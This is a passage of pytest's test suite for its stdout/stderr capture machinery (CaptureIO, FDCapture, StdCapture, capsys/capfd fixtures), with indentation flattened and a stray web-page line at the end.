def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO(object):
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
if sys.version_info >= (3, 0):
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
else:
f.write(u"\u00f6")
f.write(b"hello")
s = f.getvalue()
f.close()
assert isinstance(s, text_type)
@pytest.mark.skipif(sys.version_info[0] == 2, reason="python 3 only behaviour")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.mark.skipif("sys.version_info < (3,)", reason="python2 has no buffer")
def test_dontreadfrominput_buffer_python3():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
fb = f.buffer
assert not fb.isatty()
pytest.raises(IOError, fb.read)
pytest.raises(IOError, fb.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(ValueError, fb.fileno)
f.close() # just for completeness
@pytest.mark.skipif("sys.version_info >= (3,)", reason="python2 has no buffer")
def test_dontreadfrominput_buffer_python2():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
with pytest.raises(AttributeError):
f.buffer
f.close() # just for completeness
@pytest.yield_fixture
def tmpfile(testdir):
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile):
flist = []
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
bio = io.BytesIO()
f = capture.safe_text_dupfile(bio, "wb")
f.write("hello")
assert bio.getvalue() == b"hello"
assert "BytesIO object" in f.name
def test_dupfile_on_textio():
tio = py.io.TextIO()
f = capture.safe_text_dupfile(tio, "wb")
f.write("hello")
assert tio.getvalue() == "hello"
assert not hasattr(f, "name")
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError):
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof'")
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture(object):
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self, tmpfile):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self, tmpfile):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture(object):
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == u"hxąć\n"
@pytest.mark.skipif(
"sys.version_info >= (3,)", reason="text output different for bytes on python3"
)
def test_capturing_readouterr_decode_error_handling(self):
with self.getcapture() as cap:
# triggered an internal error in pytest
print("\xa6")
out, err = cap.readouterr()
assert out == u"\ufffd\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""
import os
def test_x():
os.write(1, "hello\\n".encode("ascii"))
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD(object):
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=None _state=None>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=None _state=None>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=None _state=None>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, "dup"):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream(object):
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
from __future__ import print_function
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
assert "IOError" not in result.stdout.str()
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
if _PY3:
result_with_capture.stdout.fnmatch_lines(
["E TypeError: write() argument must be str, not bytes"]
)
else:
assert result_with_capture.ret == 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.